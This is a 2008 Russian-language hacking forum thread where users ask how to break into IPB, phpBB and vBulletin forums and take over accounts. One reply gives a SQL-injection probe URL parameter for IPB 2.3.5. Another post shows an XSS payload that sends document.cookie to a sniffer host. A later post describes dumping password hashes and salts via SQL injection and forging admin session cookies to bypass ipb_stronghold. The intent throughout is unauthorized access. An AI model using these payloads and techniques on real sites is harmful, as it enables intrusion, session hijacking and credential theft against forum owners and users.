03.12.2008, 21:36
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
С нами:
10356158
Репутация:
16
|
|
Здарова , такой вопрос созрел, есть ли возможность взломать орума на движке IPB 2.3.5. Спасибо.
|
|
|
04.12.2008, 01:07
|
|
Познающий
Регистрация: 24.11.2008
Сообщений: 35
С нами:
9190077
Репутация:
4
|
|
Сообщение от Taylorith
Здарова , такой вопрос созрел, есть ли возможность взломать орума на движке IPB 2.3.5. Спасибо.
Под 2.3.5 есть эксплоит поищи на этом форуме... но если админ толковый, хотя у толкового уже 2.3.6 было бы  , то дырку сразу пропатчили...
Проверяется просто после index.php? добавляешь:
act=xmlout&do=check-display-name&name=%2527 и если увидишь сообщение мол драйвер не работает, то этот форум о тебе услышит
Если нет, то есть куча способов (хотя нет не куча, кучка, маленькая такая....  ) как угнать куку админа!
А вот пиляха как её заюзать, учитывая что эта гадость проверяет IP, не знаю... Это надо ГУРУ спрашивать, они знают. ТОка мож эта инфа пока что приватная 
Есть спец тулзы которые позволяют менять хидеры на лету, но вот тока где в в ипб лежит инфа про ИП - хоть убейте не вижу  Пробовал подменить свой айпи на 2ip.ru - нивопрос, получилось, а вот на IPB ...
Успехов.
Последний раз редактировалось NewBHack; 04.12.2008 в 01:12..
|
|
|
|
04.12.2008, 18:54
|
|
Новичок
Регистрация: 01.12.2008
Сообщений: 10
С нами:
9179907
Репутация:
0
|
|
Драсти
Люди прошу обьяснить как вернуть себе акк на етом форуме phpBB (незнаю версию) forum.s-c.ru плиз помогите угнали ник у меня прошу помочь советом как его вернуть :Брутить и т д наперёд спасибо
А мне кто нить поможет? |
|
|
|
04.12.2008, 20:06
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от RomaM65
Люди прошу обьяснить как вернуть себе акк на етом форуме phpBB (незнаю версию) forum.s-c.ru плиз помогите угнали ник у меня прошу помочь советом как его вернуть :Брутить и т д наперёд спасибо
А мне кто нить поможет? админу отписать ..и рассказать ситуацию...
|
|
|
|
04.12.2008, 20:27
|
|
Новичок
Регистрация: 01.12.2008
Сообщений: 10
С нами:
9179907
Репутация:
0
|
|
Админа на форуме уже 2 месяца нет поетому и хочу ломонуть |
|
|
|
06.12.2008, 16:14
|
|
Новичок
Регистрация: 28.07.2007
Сообщений: 2
С нами:
9888739
Репутация:
0
|
|
Помогите , есть ли возможность узнать пароль на закрытй форум ? ipb 2.1.6 .
|
|
|
|
06.12.2008, 16:22
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
С нами:
10467109
Репутация:
222
|
|
2super-rol
http://forum.antichat.ru/threadnav25088-1-10.html
Выбирай нужный)
Последний раз редактировалось Extremal; 06.12.2008 в 16:28..
|
|
|
|
07.12.2008, 00:18
|
|
Новичок
Регистрация: 28.07.2007
Сообщений: 2
С нами:
9888739
Репутация:
0
|
|
Можно ли с помощью снифера получить пароль пользователя на форуме ipb 2.1.6 ? используя функцию Жалоба , вставляя следующий код
<script>img = new Image(); img.src = "Адрес снифера?"+document.cookie;</script>
Какой текст нужно напсать чтобы аватар был снифером и крал куки ?
Последний раз редактировалось super-rol; 07.12.2008 в 02:45..
|
|
|
|
15.12.2008, 01:03
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
С нами:
9168511
Репутация:
214
|
|
Можно как нибудь угнать акк на двиге VBulletin 3.6.6 ???
|
|
|
|
18.12.2008, 16:38
|
|
Новичок
Регистрация: 17.12.2008
Сообщений: 3
С нами:
9157544
Репутация:
0
|
|
Привет. Вообщем такая тема.Через скулю на сайте вытащил converge_pass_hash & pass_salt в надежде сбрутить пасс админа. Скока не брутил не получилось(наверн парольчик сложный). Потом решил зайт через куки,вытащил members_login_key но при входе идём проверку на какой-то ipb_stronghold,походу версия ipb новая т.к. в ранних такого небыло. нагуглил что эта хрень хэшируется из айпи айди пасса и ещё чего-то типо дополнительная защита при входе. так вот мне интересно можно как-нить потделать это при условии что айпи я знаю и всё остальное и зайдётли в админку с этими куками? Т.к. админка моя главная цель.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
